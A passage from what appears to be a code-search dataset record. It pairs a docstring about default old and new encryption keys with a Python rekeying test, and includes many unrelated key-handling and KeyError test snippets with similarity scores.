context.\")", "def test03Expire(self):\n s = utils.FastStore(max_size=100)\n key = \"test1\"\n s.Put(key, 1)\n\n # This should not raise\n self.assertEqual(s.Get(key), 1)\n s.ExpireObject(key)\n\n self.assertRaises(KeyError, s.Get, key)", "def error(self, key, value, context, errorclass=InvalidDataError, **values):\n msg_template = self.message_for_key(key, context)\n raise errorclass(msg_template % values, value, key=key, context=context)", "def touchKBucket(self, key):", "def test01StoreExpiration(self):\n s = utils.FastStore(max_size=5)\n keys = []\n for i in range(0, 100):\n keys.append(s.Put(i, i))\n\n # This should not raise\n s.Get(keys[-1])\n\n # This should raise though\n self.assertRaises(KeyError, s.Get, keys[0])", "def test_get_latest_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.get_latest_dweet_for(self.my_thing_id, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def validate_instruction_keys(instruction: TransactionInstruction, expected: int) -> None:\n if len(instruction.keys) < expected:\n raise ValueError(f\"invalid instruction: found {len(instruction.keys)} keys, expected at least {expected}\")", "def test_other_user_kvs_set_failure(self):\r\n with self.assertRaises(AssertionError):\r\n self.kvs.set(self.other_key_factory(self.existing_field_name), \"new_value\")", "def test_toofewkeys(self):\n self.assertRaises(recordparser.KeyListMismatchError,\n recordparser.getfields, \"1234567890\", \"10s\", ())", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def test_invalid_chars_ssck(self):\r\n valid_base = SlashSeparatedCourseKey(u'org.dept-1%2', u'course.sub-2%3', u'run.faster-4%5')\r\n for key in SlashSeparatedCourseKey.KEY_FIELDS:\r\n with self.assertRaises(InvalidKeyError):\r\n # this ends up calling the constructor where the legality check should occur\r\n valid_base.replace(**{key: u'funny thing'})", "def test_throws_base_price_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n BasePrice.Schema().loads(json.dumps(base_price_missing_key))", "def Add(self, key, *args):\n temp_error = Errors()\n if ErrMsg.isValidKey(key, ErrMsg._MsgKey__class, temp_error):\n if key.argcount != len(args):\n if not self._keychainExists(key):\n self._keychainExists(key, True)\n exception = self._validateException(key.exception)\n if exception:\n self.Raise(exception, key, args)\n else:\n self._add(key, args)\n else:\n self.Add(ErrMsg.Error.Add.Invalid_Msgformat, key.message, args)\n\n elif ErrMsg.isValidKey(key, None, temp_error):\n # Assume GENERIC status\n\n key = ErrMsg._defaultKeyChain(key, temp_error)\n if temp_error:\n pass\n else:\n self.Add(key, args)\n else:\n self.Add(ErrMsg.Error.Add.Invalid_Errorkey, key.message, args)", "def test_getitem_nokey(testchannel):\n key = testchannel.add(list)\n for i in range(5):\n testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def _invalid_transport_key_id():\n pecan.abort(404, u._('Not Found. Provided transport key id is invalid.'))", "def test_is_valid_label_key_invalid_input():\n # test length violations\n assert not is_valid_label_key(key=None) # Too short\n assert not is_valid_label_key(key=\"\") # Too short\n assert not is_valid_label_key(key=f\"{'p' * 254}/n\") # prefix too long\n assert not is_valid_label_key(key=\"/n\") # prefix too short\n assert not is_valid_label_key(key=\"p/\") # name too short\n assert not is_valid_label_key(key=\"a\" * 254) # name too long\n assert not is_valid_label_key(key=f\"d/{'b'*64}\") # name too long\n # test first character violations (not alphanum)\n assert not is_valid_label_key(key=\"-a\")\n assert not is_valid_label_key(key=\".b\")\n assert not is_valid_label_key(key=\" c\")\n # test last character violations (not alphanum)\n assert not is_valid_label_key(key=\"a-\")\n assert not is_valid_label_key(key=\"b.\")\n assert not is_valid_label_key(key=\"c \")\n assert not is_valid_label_key(key=\"sw33T#\")\n # test middle characters violations\n assert not is_valid_label_key(key=\"a$$a\")\n assert not is_valid_label_key(key=\"b b\")", "def test_get_write_fail(self):\n os.chmod(self.test_key_filename, 0400)\n\n self.assertRaises(IOError, self.key_gen.get)", "def test_get_invalid_key(self):\n pairs = {'library': '~/home/documents/dms',\n 'key': 'value',\n }\n exceptionKeys = ['Hello', 'spam']\n try:\n tempconfig = tempfile.NamedTemporaryFile(\n suffix=\".yaml\", delete=False)\n tempconfig.write('ham: eggs'.encode('UTF-8'))\n tempconfig.close()\n config = easydms.config.Config(tempconfig.name)\n\n for key, value in pairs.items():\n self.assertEqual(config.getKey(key, value), value)\n\n for key in exceptionKeys:\n with self.assertRaises(easydms.config.ErrorConfigKeyNotFound):\n config.getRequiredKey(key)\n finally:\n os.remove(tempconfig.name)", "def test_empty_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(\n key=\"\", description=\"container\", software_system=system1\n )", "def error(self, key, **kwargs):\n try:\n msg = self.error_messages[key]\n except KeyError:\n class_name = self.__class__.__name__\n raise AssertionError('Error with key={} is not found for class={}'.format(key, class_name))\n message_string = msg.format(**kwargs)\n raise ValidationError(message_string, code=key)", "def test_basic_singleton_key_error(self):\n\n schema = {\n ('root', str): {\n ('sample node', str, 'sample'): ('node', str, r'[a-z]*')\n }\n }\n data = {'root': {'not sample': 'node'}}\n\n ERRORS = lws.return_errors()\n expected_schema = {\n ('root', 'root'): [('sample node', ERRORS['key'])]\n }\n expected_data = {\n ('root', 'root'): [('not sample', ERRORS['key'])]\n }\n\n assert dict(lws.validate_schema(schema, data)) == expected_schema\n assert dict(lws.validate_data(schema, data)) == expected_data", "def testBadDataToToken(self):\n key = createKey()\n self.assertRaises(ValueError, dataToToken, key, data=self)", "def test_non_hashable1(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar\n d = {}\n self.assertRaises(TypeError, hash, xp)\n self.assertRaises(TypeError, d.setdefault, xp, 'key')", "def gpgkey_error(self, repo_id, error):\n self.send(repo_id, 'gpgkey_error', error)", "def test_addProcessDuplicateKeyError(self):\r\n self.pm.addProcess(\"foo\", [\"arg1\", \"arg2\"],\r\n uid=1, gid=2, env={})\r\n self.assertRaises(KeyError, self.pm.addProcess,\r\n \"foo\", [\"arg1\", \"arg2\"], uid=1, gid=2, env={})", "def _raiseIfWebsafeKeyNotValid(websafeKey, kind):\n # Check that websafeKey is not None\n if not websafeKey:\n raise endpoints.BadRequestException(\n \"Websafe key not provided for '%s'\" % kind)\n # Try to decode the websafe key into a real key\n try:\n key = ndb.Key(urlsafe=websafeKey)\n except:\n raise endpoints.BadRequestException(\n \"Websafe key provided for '%s' could not be decoded: %s\" %\n (kind, websafeKey))\n # Ensure that the key is of the desired kind\n if key.kind() != kind:\n raise endpoints.BadRequestException(\n \"Websafe key is not of the '%s' kind: %s\" % (kind, websafeKey))\n # If all is well, return the key\n return key", "def test_toomanykeys(self):\n self.assertRaises(recordparser.KeyListMismatchError,\n recordparser.getfields, \"1234567890\", \"10s\", (\"key1\", \"key2\"))", "def test_newkey(self):\n d = {\n \"action\": \"set\",\n \"node\": {\n \"expiration\": \"2013-09-14T00:56:59.316195568+02:00\",\n \"modifiedIndex\": 183,\n \"key\": u(\"/testkey\"),\n \"ttl\": 19,\n \"value\": \"test0\",\n },\n }\n\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n zeroth = res.header.revision\n d[\"node\"][\"value\"] = \"test1\"\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n self.assertEqual(zeroth + 1, res.header.revision)\n self.assertEqual(self.client.get(d[\"node\"][\"key\"])[0], b(d[\"node\"][\"value\"]))", "def test_validate_with_invalid_key_format_type(self):\n key_format_type = \"invalid\"\n kwargs = {'key_format_type': key_format_type}\n\n self.assertRaisesRegex(\n TypeError, \"invalid key format type\", Digest, **kwargs)", "def test_get_empty(empty_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n empty_bucket.get(\"key 1\")", "def test_primary_key_update_failure(self):\n m0 = TestUpdateModel.create(count=5, text='monkey')\n with self.assertRaises(ValidationError):\n m0.update(partition=uuid4())", "def test_primary_key_update_failure(self):\r\n m0 = TestUpdateModel.create(count=5, text='monkey')\r\n with self.assertRaises(ValidationError):\r\n m0.update(partition=uuid4())", "def provoke_and_handle_KeyError():\n test_dict = {}\n try:\n print(test_dict['to life'])\n except KeyError as ke:\n print(f\"Sorry! The key '{ke}' does not exist in test_dict!\")", "def _validate_key(self, key):\n if isinstance(key, str):\n key = unicode(key, 'utf-8')\n elif not isinstance(key, unicode):\n raise TypeError(\n \"`key` must be `str` or `unicode`, not `{}`\".format(\n key.__class__.__name__)\n )\n return key", "def test_getitem_cleared_key(testchannel):\n key = testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def _keychainExists(self, key, create_new=False):\n if ErrMsg._validateKey(key):\n curr_dict = self._errors\n\n for i, comp in enumerate(key._comps):\n create_type = dict if i < 2 else list\n if comp in curr_dict.keys():\n curr_dict = curr_dict[comp]\n else:\n if create_new:\n curr_dict[comp] = create_type()\n curr_dict = curr_dict[comp]\n else:\n return False\n return True", "def _check_transform_key(key: Hashable) -> None:\n _test_hashable = hash(key) # The only 'real' way to make sure is hashable\n # if not isinstance(key, Hashable):\n # raise TypeError((type(key), \"transformation lookup key is not hashable\"))", "def test_key_without_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)", "def Raise(self, exception, key, *args):\n self._add(key, *args)\n if exception:\n raise exception(key.message, *args)", "def test_set_key_filename_missing(self):\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", \"/bogus\"]\n self.check_error(StratisCliKeyfileNotFoundError, command_line, _ERROR)", "def validate_key(self, key: keyType) -> bool:\n if isinstance(key, (dict,bool)):\n raise Exception\n if key is None:\n raise Exception\n # Numerical key object has no len(),\n # so explicitly specify which types are not allowed to use empty value as keys\n if isinstance(key, (str, tuple, set, list)) and (len(key) == 0):\n raise Exception\n return True", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def test_from_dict_bad_event_key(self):\n from google.appengine.ext import ndb\n\n from sosbeacon.event.event import Event\n from sosbeacon.event.message import Message\n\n event_key = ndb.Key(Event, 1)\n\n self.assertRaisesRegexp(\n Exception, \"Event not found\",\n Message.from_dict, {'event': event_key})", "def duplicate_transition_raise_error(old_transition, new_transition):\n raise ValueError(\"Attempting to re-insert transition %s\" % old_transition)", "def test_primary_key_update_failure(self):\r\n with self.assertRaises(ValidationError):\r\n TestQueryUpdateModel.objects(partition=uuid4(), cluster=3).update(cluster=5000)", "def test_no_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(description=\"container\", software_system=system1)", "def fail(team, chal, request):\n provided_key = request.form['key'].strip()\n wrong = WrongKeys(teamid=team.id, chalid=chal.id, ip=utils.get_ip(request), flag=provided_key)\n db.session.add(wrong)\n db.session.commit()\n db.session.close()" ]
[ "0.71822304", "0.70056105", "0.69519156", "0.6922246", "0.6791061", "0.6753472", "0.6749198", "0.67076725", "0.66495234", "0.6584771", "0.6557083", "0.65199524", "0.65018636", "0.64907044", "0.6454335", "0.64416265", "0.6438558", "0.6431475", "0.6424363", "0.6396235", "0.63894755", "0.6379695", "0.6369072", "0.6369072", "0.6349258", "0.6336291", "0.6314593", "0.6310023", "0.6263599", "0.6214058", "0.619933", "0.6195926", "0.61839104", "0.6180844", "0.61710143", "0.61701", "0.61675197", "0.6160887", "0.61553526", "0.6134571", "0.6133002", "0.6122567", "0.61141545", "0.6102656", "0.60887134", "0.6081197", "0.6072503", "0.60629517", "0.6060599", "0.6059191", "0.60574055", "0.6054328", "0.60524935", "0.60360503", "0.60320467", "0.60289913", "0.602703", "0.6023822", "0.6020414", "0.6018472", "0.60141885", "0.60129935", "0.60079235", "0.6005047", "0.5995934", "0.599087", "0.59876066", "0.59824985", "0.5976984", "0.59693676", "0.59335774", "0.59328085", "0.5929741", "0.5929209", "0.5920798", "0.59121513", "0.5911046", "0.59101313", "0.59052426", "0.59047633", "0.58857906", "0.5881801", "0.58813184", "0.58812696", "0.58803886", "0.58695865", "0.5867112", "0.5854723", "0.58537847", "0.5852574", "0.58463204", "0.58360684", "0.58129025", "0.58075684", "0.5802714", "0.57844764", "0.5769324", "0.5767626", "0.5765389", "0.575955" ]
0.7050168
1
It uses the settings for the default old and new key.
def test_rekey_defaults(self, settings): old_key = b'0' * 32 new_key = b'1' * 32 settings.CHITON_ENCRYPTION_KEY = new_key settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key encrypted = encrypt('message', key=old_key) rekeyed = rekey(encrypted) assert decrypt(rekeyed) == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_key(self):\n self.__prev_key = self.__new_key", "def update_dict(new,old):", "def _newKey(self, key):\n pass", "def update_default_from_dict(self, key, value):\n pass", "def test_overwrite(self):\n set_default_for_missing_keys('hello world')\n set_default_for_missing_keys(123, overwrite=True)\n\n assert DotWizPlus().missing_key == 123", "def _swap_settings(new):\n settings = django.conf.settings\n old = {}\n for key, value in new.iteritems():\n old[key] = getattr(settings, key, None)\n setattr(settings, key, value)\n return old", "def test_load_updates_dict(self):\n new_dict = {\n 'test_new_key': 'test_new_value',\n 'test_key1': 'new_value',\n }\n self.extension.registration.settings = new_dict\n self.settings.load()\n\n # Should have added test_new_key, and modified test_key1\n self.assertEqual(new_dict['test_new_key'],\n self.settings['test_new_key'])\n self.assertEqual(new_dict['test_key1'], self.settings['test_key1'])\n\n # Should have left test_key2 alone\n self.assertEqual(self.test_dict['test_key2'],\n self.settings['test_key2'])", "def setdefault(self, key):\n pass", "def _reset_changes(self):\r\n self._original = {}\r\n if self.last_updated is not None:\r\n self._original['last_updated'] = self.last_updated", "def trello_updates(new, old):\n try:\n return {k: (v, new[k]) for k, v in old.iteritems()}\n except KeyError:\n return {k: (v, None) for k, v in old.iteritems()}", "def rename_dictkey(self, kwargs, old, new):\n x = kwargs.copy()\n x[new] = x.pop(old)\n return x", "def _metrics_update(orig, new):\n revsd = orig\n for k, v in orig.items():\n if not v:\n revsd[k] = new[k]\n elif new[k]:\n if new[k] != v:\n # LOG ME, do something\n print(orig)\n print(new)\n elif not new[k] or v:\n pass\n else:\n raise Exception(\"_metrics_update error\")\n return revsd", "def _update_key(cls, spec):\n if cls.KEY is not None:\n cls._set_key(spec, spec[\"keys\"].popleft())\n elif cls.REF is not None:\n spec[\"ref\"] = cls.REF", "def upgrade_settings(self, keys):\n upgradable_keys = {\n \"project_dir\": \"%root_dir%\",\n \"source_folder\": \"%source_folder%\",\n \"packages_path\": \"%packages_path%\",\n \"sep\": \"%sep%\",\n \"$\": \"$\"\n }\n for key in keys:\n value, from_global = self.get(key, as_tuple=True)\n value = value.replace(\"%\", \"%%%\")\n for k in upgradable_keys:\n value = value.replace(\"$\" + k, upgradable_keys[k])\n self.set(key, value, to_global=from_global)", "def setdefault_key_value(self):\n raise NotImplementedError", "def add_default_args(kwargs_old, **kwargs_new):\n for key in kwargs_new:\n if key not in kwargs_old:\n kwargs_old[key] = kwargs_new[key]", "def test_newkey(self):\n d = {\n \"action\": \"set\",\n \"node\": {\n \"expiration\": \"2013-09-14T00:56:59.316195568+02:00\",\n \"modifiedIndex\": 183,\n \"key\": u(\"/testkey\"),\n \"ttl\": 19,\n \"value\": \"test0\",\n },\n }\n\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n zeroth = res.header.revision\n d[\"node\"][\"value\"] = \"test1\"\n res = self.client.put(d[\"node\"][\"key\"], d[\"node\"][\"value\"])\n self.assertEqual(zeroth + 1, res.header.revision)\n self.assertEqual(self.client.get(d[\"node\"][\"key\"])[0], b(d[\"node\"][\"value\"]))", "def setdefault(self, k, d=None): # real signature unknown; restored from __doc__\n pass", "def on_change(key):\n pass", "def _swap_keys(ordered_dict, old_key, new_key):\n return odict(\n (new_key, val) if key == old_key else (key, val)\n for key, val in ordered_dict.iteritems()\n )", "def _update_default_dict(main, other):\r\n for k, v in other.items():\r\n main[k] += v", "def __swap_kv(self, node1, node2):\r\n node1.key, node2.key = node2.key, node1.key\r\n node1.value, node2.value = node2.value, node1.value", "def update_config(original, new):\n for k, v in new.items():\n if isinstance(v, abc.Mapping):\n original[k] = update_config(original.get(k, {}), v)\n else:\n original[k] = v\n return original", "def keyEquivalent( self ):\n\t\treturn None", "def renameKey(self, oldKey, newKey, meta=None, units=None):\n\n if meta:\n if oldKey not in meta:\n return\n meta.replaceKey(oldKey, newKey)\n if units:\n if oldKey not in units:\n return\n units.replaceKey(oldKey, newKey)", "def construct_kv_dict(self):\r\n key1 = self.key_factory('existing_field')\r\n key2 = self.key_factory('other_existing_field')\r\n new_value = 'new value'\r\n newer_value = 'newer value'\r\n return {key1: new_value, key2: newer_value}", "def config_from_user(self):\n if self.configDict is not None and len(self.configDict.keys()) > 0:\n for key in sorted(self.configDict.keys()):\n tempInput = input(\n 'set ' + key + '(currently ' + str(self.configDict[key]) + ') to :')\n if tempInput != '':\n self.configDict[key] = tempInput\n else:\n print ('starting with a new empty dictionary...')\n self.configDict = {}\n while True:\n key = input('Enter a new Key, or -1 to quit:')\n if key == '-1' or key == '':\n break\n else:\n value = input('Enter a value for ' + key + ':')\n self.configDict.update({key: value})", "def change(self, key, old_value, new_value):\n try:\n parts = self.list(key)\n try: parts[parts.index(old_value)] = new_value\n except ValueError:\n self[key] = new_value\n else:\n self[key] = \"\\n\".join(parts)\n except KeyError: self[key] = new_value", "def construct_kv_dict(self):\r\n key1 = user_state_key('field_a')\r\n key2 = user_state_key('field_b')\r\n new_value = 'new value'\r\n newer_value = 'newer value'\r\n return {key1: new_value, key2: newer_value}", "def test_merge_overwrite_missing_source_key(self):\n mdict = copy.deepcopy(self.dict1)\n mdict[\"D\"] = \"new\"\n ret = dictupdate.merge_overwrite(copy.deepcopy(self.dict1), {\"D\": \"new\"})\n self.assertEqual(mdict, ret)", "def keychange(self):\n # if response.json()['error']['errors'][0]['reason']=='quotaExceeded':\n self.keyindex += 1\n if self.keyindex == len(self.keylist):\n self.keyindex = 0\n print('Keylist length reached')\n print('Changinf Key..')\n key = self.keylist[self.keyindex]\n print(\"Quota Exceeded\", self.keyindex)\n return key", "def switch_on_key(self, key):\n if key in self.switched_off_keys:\n self._switched_off_keys.pop(self._switched_off_keys.index(key))\n self._config[key] = self._config.pop(\"# \"+key)", "def _update_dict(self, d1, d2):\n overridden = {} # contains parameters that were overwritten as tuples (old,new)\n\n for section, prms in d2.iteritems():\n if \"group_contribution\" in section or \"restraints\" in section or \"lambdas\" in section:\n if section in d1:\n overridden[section] = (d1[section], prms)\n d1[section] = prms\n else:\n if section not in d1:\n d1[section] = {}\n for keyword,prm in prms.iteritems():\n if keyword in d1[section]:\n if d1[section][keyword] != prm:\n overridden[section + \"/\" + keyword] = (d1[section][keyword], prm)\n d1[section][keyword] = prm\n return overridden", "def replace_key(newKey, oldKey, filename, ssh):\n ssh.exec_command(\"sed -i 's;%s;%s;g' %s\" % (oldKey, newKey, filename))", "def override_model_args(old_args, new_args):\r\n global MODEL_OPTIMIZER\r\n old_args, new_args = vars(old_args), vars(new_args)\r\n for k in old_args.keys():\r\n if k in new_args and old_args[k] != new_args[k]:\r\n if k in MODEL_OPTIMIZER:\r\n logger.info('Overriding saved %s: %s --> %s' %\r\n (k, old_args[k], new_args[k]))\r\n old_args[k] = new_args[k]\r\n else:\r\n logger.info('Keeping saved %s: %s' % (k, old_args[k]))\r\n\r\n return argparse.Namespace(**old_args)", "def test_old_from_and_to_text(self):\n rkeyring = dns.tsigkeyring.from_text(old_text_keyring)\n tkeyring = dns.tsigkeyring.to_text(rkeyring)\n self.assertEqual(tkeyring, old_text_keyring)", "def default(self, key):\r\n return self.inherited_settings[key.field_name]", "def conf_update(self):\n pass", "def reset(self):\n self.keyToFile=dict()", "def replace_default_urls():\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/defaults.json') as default_urls_json:\n default_dict = json.load(default_urls_json)\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/recent_urls.json') as recent_urls_json:\n recent_dict = json.load(recent_urls_json)\n for key, value in recent_dict.items():\n default_dict[key] = value\n with open('HousingPriceScraper/HousingPriceScraper/configs/input_urls/defaults.json', 'w') as fp:\n json.dump(default_dict, fp, sort_keys=True, indent=4)", "def replace_cfs(old_key, new_key):\n altered_methods = []\n for name in methods:\n changed = False\n data = Method(name).load()\n for line in data:\n if line[0] == old_key:\n line[0], changed = new_key, True\n if changed:\n Method(name).write(data)\n altered_methods.append(name)\n return altered_methods", "def decrease_key(self, old_item, new_item):", "def test_changing_defaults_doesnt_autocommit_to_file():\n state = StateFile()\n state.coolkey = StateAttr(state_file=state,\n key_name=\"cool_key\",\n default=3)\n with pytest.raises(StateNotAcquiredError):\n state.coolkey.read()\n\n with state:\n assert state.coolkey.read() == 3\n\n # Now create a new statefile with a DIFFERENT default, and make sure that\n # didn't get written to the file\n state = StateFile()\n state.coolkey = StateAttr(state_file=state,\n key_name=\"cool_key\",\n default=420)\n with state:\n assert state.coolkey.read() == 3", "def __init__(self, key: str, value: str) -> None:\n self.key = key\n self.value = value\n self.old_value = \"\"\n if Config.has_value(key):\n self.old_value = Config.get_value(key)", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def _browse_to_old_dict(self):\n lang = self.ddnGuiLanguage.get()\n\n filein = filedialog.askopenfilename(\\\n filetypes=[('Map Creator Dictionary', '.xml'), ], \\\n initialdir=self.MapCreator, \\\n initialfile='', \\\n title=LOCALIZED_TEXT[lang]['Map Creator Dictionary'], \\\n defaultextension='.xml')\n self.old_dict.set(filein)\n pass", "def _update(d):\n newd = copy.deepcopy(default)\n\n if 'lastdir' in d:\n newd['lastdir'] = d['lastdir']\n\n return newd", "def _update_prepend_key(self):\n self.prepend_key -= 1", "def apply_current_or_orig_values(override, current_version, args):\n keys = args.keys\n if current_version:\n print \"\\tUsing metadata values from {} version {}.\".format(\n current_version[\"name\"], current_version[\"version\"])\n for key in keys:\n current_val = current_version.get(key)\n if current_val:\n override[\"Input\"][\"pkginfo\"][key] = current_val\n else:\n default = override[\"Input_Original\"].get(\n \"pkginfo\", {}).get(key, \"\")\n choice = \"\"\n if not args.no_prompt:\n print \"\\tNo current '%s' value found to apply.\" % key\n print \"\\tRecipe specifies: '%s'\" % default\n choice = raw_input(\"\\tHit enter to use the recipe value, or \"\n \"enter a new value: \")\n override[\"Input\"][\"pkginfo\"][key] = (\n default if choice == \"\" else choice)", "def test_dictionary_inplace_update(self):\r\n vm = Dictionary.value_manager(None, None, {1:2, 3:4})\r\n assert not vm.changed\r\n vm.value[4] = 5\r\n assert vm.changed", "def revert(self, record, new_password):\n if self.old_key_deleted:\n if self.aws_sync_profile:\n if self.sync_with_creds_file():\n logging.info(\n f'New key id \"{self.new_key_id}\" was updated in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, but failed to update in Keeper record.'\n )\n else:\n logging.info(\n f'New key id {self.new_key_id} failed to update in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, and also failed to update in Keeper record.'\n )\n return False\n else:\n self.delete_key(new_key=True)", "def getChanged(self,key,default=None):\n if default != None and key not in self.data:\n self.data[key] = default\n self.setChanged(key)\n return self.data.get(key)", "def check_get_and_set_method_for_key(self, tab, key):\r\n old_value = tab[key]\r\n new_value = 'New Value'\r\n tab[key] = new_value\r\n self.assertEquals(tab[key], new_value)\r\n tab[key] = old_value\r\n self.assertEquals(tab[key], old_value)", "def update_start_settings(self, key, value):\n\n if key in self._start_settings:\n self._start_settings[key] = value\n else:\n print(\"key does not exist!! keys include: {charge_option, prec, encut, nstep, epsilon, pseudo, n_elect.structure, smear, sigma, isym}\")", "def switch_off_key(self, key):\n if key not in self.switched_off_keys:\n self._switched_off_keys.append(key)\n self._config[\"# \"+key] = self._config.pop(key)", "def _set_toChange(x):\n for key in list(x.keys()):\n self.toChange[key] = True", "def harmonize_keys(self):\n self._data.key_regex_replacements = _key_regex_replacements\n self._data.key_replacements = _key_replacements", "def _update(self, *keys_and_val):\n if len(xxx) < 2:\n raise NotEnoughInfo\n value, *location = xxx[::-1]\n location.reverse()\n final_key = location.pop()\n ptr__target_dct = get_target_dct(location)\n ptr__target_dct[final_key] = value\n return", "def old_passwords(self, old_passwords):\n\n self._old_passwords = old_passwords", "def remap_keys(ds, new_keys):\n logger.info(\"Remapping keys of every element using config:\\n %s\", _dict_to_logstring(new_keys))\n\n def remap_keys(x):\n return {new_keys.get(k, k): v for k, v in x.items() if new_keys.get(k, k) is not None}\n return ds.map(remap_keys, num_parallel_calls=TF_AUTOTUNE)", "def _overwrite_parameters_from_input(self, new_params):\n params_overwrite = self.inputs.params_overwrite.get_dict()\n for key, val in params_overwrite.items():\n if key in new_params:\n self.report('ATTENTION: overwriting parameter from \"params_overwrite\" input')\n self.report(f'key: {key}')\n self.report(f'old value: {new_params[key]}')\n self.report(f'overwritten value: {val}')\n new_params[key] = val", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def _copy_cipher_settings(self, other):\n other.cipherNames = self.cipherNames\n other.macNames = self.macNames\n other.keyExchangeNames = self.keyExchangeNames\n other.cipherImplementations = self.cipherImplementations\n other.minVersion = self.minVersion\n other.maxVersion = self.maxVersion\n other.versions = self.versions", "def _mergeKeys(self, other):\n for id in set(other.clock.keys()).difference(set(self.clock.keys())):\n self.clock[id] = 0\n for id in set(self.clock.keys()).difference(set(other.clock.keys())):\n other.clock[id] = 0", "def _refresh(self):\n # if we have all the values we need to hookup to the URL\n for key in self.DBMSettings.keys():\n if not key.startswith(LOCALCHAR):\n self.DBMSettings[key] = self._urldict()[key]", "def _add_missing_keys(self):\n for k, v in self.defaults.items():\n if k not in self.data:\n self.data[k] = v\n\n self.save()", "def _eq_key(self):\n return super(UpdateMessage, self)._eq_key + (self.previous_payload,)", "def test_migrating_old_and_new_keys(self):\n yield self.mk_simple_models_old(1)\n yield self.mk_simple_models_new(1, start=1)\n yield self.mk_simple_models_old(1, start=2)\n model_migrator = self.make_migrator(self.default_args)\n loads, stores = self.recorded_loads_and_stores(model_migrator)\n\n yield model_migrator.run()\n self.assertEqual(model_migrator.output, [\n \"Migrating ...\",\n \"Done, 3 objects migrated.\",\n ])\n self.assertEqual(sorted(loads), [u\"key-0\", u\"key-1\", u\"key-2\"])\n self.assertEqual(sorted(stores), [u\"key-0\", u\"key-2\"])", "def default_values():\n return pad_keys({}, default_basenames())", "def override_opt(self, new_opt):\n model_args = {'optimizer', 'lookuptable', 'beam_size'}\n for k, v in new_opt.items():\n if k not in model_args:\n # skip non-model args\n continue\n if k not in self.opt:\n print('[ Adding new option: | {k}: {v} | ]'.format(k=k, v=v))\n elif self.opt[k] != v:\n print('[ Overriding option: | {k}: {old} => {v} | ]'.format(\n k=k, old=self.opt[k], v=v))\n self.opt[k] = v\n if 'dict_file' in new_opt and not self.opt.get('dict_file'):\n print('[ No dictionary path detected, trying to load previous '\n 'path {} ]'.format(new_opt['dict_file']))\n self.opt['dict_file'] = new_opt['dict_file']\n return self.opt", "def load_key():", "def test_copy_new_keys_to_locale_no_changes(self):\n primary_dict = {\n \"one\": {\"hoge\": \"hoge\",\n \"naruhodo\": \"naruhodo\"}\n }\n\n secondary_dict = {\n \"one\": {\"hoge\": \"ほげ\",\n \"naruhodo\": \"なるほど\"}\n }\n\n copy_new_keys_to_locale(primary_dict, secondary_dict)\n\n expected_dict = {\n \"one\": {\"hoge\": \"ほげ\",\n \"naruhodo\": \"なるほど\"}\n }\n self.assertEqual(write_json(expected_dict), write_json(secondary_dict))", "def make_consistent(self):\r\n\r\n for key in self.get_keys():\r\n self.eliminate_key(key)\r\n\r\n for i_temp in self.indexes(): #i will be a note index\r\n for j_temp in self.get_keys_from_note(i_temp):\r\n if self.key_dict_contains(j_temp):\r\n self.add_key(j_temp,Index(i_temp))\r\n## self.key_dict[j_temp].add(str(Index(i_temp)))\r\n else:\r\n self.initiate_new_key(j_temp,Index(i_temp))", "def get(self, key, default=None):", "def setOriginal(self,neworiginal):\n\t\tself.original = neworiginal;", "def _update_use(self, key):\n\t\tif (self._replace_pol == Cache.LRU):\n\t\t\tself.cache[key]= self.hashmap[key]\n\t\tif (self._replace_pol == Cache.LRU_S):\n\t\t\tself.cache[key] = self.hashmap[key]", "def _put_to_back(self, key, value):\n\n pass", "def default(self, name, new=None, erase=False):\n # Check existence\n if name not in self._defaults:\n raise tools.UnavailableException(self._defaults, name, what=\"model default\")\n # Get current\n old = self._defaults[name]\n # Set if needed\n if erase or new is not None:\n self._defaults[name] = new\n # Return current/old\n return old", "def _value_changed(self, name, old, new):\n if self.value_lock.acquire(False):\n try:\n # Reverse dictionary lookup for the value name\n for k, v in self._options_dict.items():\n if self.equals(new, v):\n # set the selected value name\n self.selected_label = k\n return\n # undo the change, and raise 